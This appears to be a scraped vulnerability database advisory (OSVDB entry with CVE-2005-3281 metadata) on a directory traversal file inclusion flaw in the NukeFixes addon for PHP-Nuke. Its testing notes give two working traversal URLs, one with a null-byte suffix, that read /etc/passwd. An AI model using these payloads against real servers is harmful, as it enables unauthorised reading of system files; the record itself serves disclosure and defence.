ID OSVDB:20120
Type osvdb
Reporter OSVDB
Modified 2005-10-19T04:48:35
Description
Technical Description
This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.
Manual Testing Notes
http://[target]/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00
http://[target]/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd
References:
Security Tracker: 1015080
Secunia Advisory ID:17218
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0223.html
CVE-2005-3281
{"type": "osvdb", "published": "2005-10-19T04:48:35", "href": "https://vulners.com/osvdb/OSVDB:20120", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 5.0}, "viewCount": 2, "edition": 1, "reporter": "OSVDB", "title": "PHP-Nuke NukeFixes Addon modules.php file Variable Arbitrary File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2017-04-28T13:20:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3281"]}], "modified": "2017-04-28T13:20:16", "rev": 2}, "vulnersScore": 5.8}, "references": [], "id": "OSVDB:20120", "lastseen": "2017-04-28T13:20:16", "cvelist": ["CVE-2005-3281"], "modified": "2005-10-19T04:48:35", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00\n\nhttp://[target]/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd\n## References:\nSecurity Tracker: 1015080\n[Secunia Advisory ID:17218](https://secuniaresearch.flexerasoftware.com/advisories/17218/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0223.html\n[CVE-2005-3281](https://vulners.com/cve/CVE-2005-3281)\n"}
{"cve": [{"lastseen": "2020-10-03T11:34:56", "description": "Directory traversal vulnerability in NukeFixes 3.1 for PHP-Nuke 7.8 allows remote attackers to include arbitrary files via the file parameter.", "edition": 3, "cvss3": {}, "published": "2005-10-23T10:02:00", "title": "CVE-2005-3281", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3281"], "modified": "2008-09-05T20:53:00", "cpe": ["cpe:/a:nukefixes:nukefixes:3.1"], "id": "CVE-2005-3281", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3281", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:nukefixes:nukefixes:3.1:*:*:*:*:*:*:*"]}]}
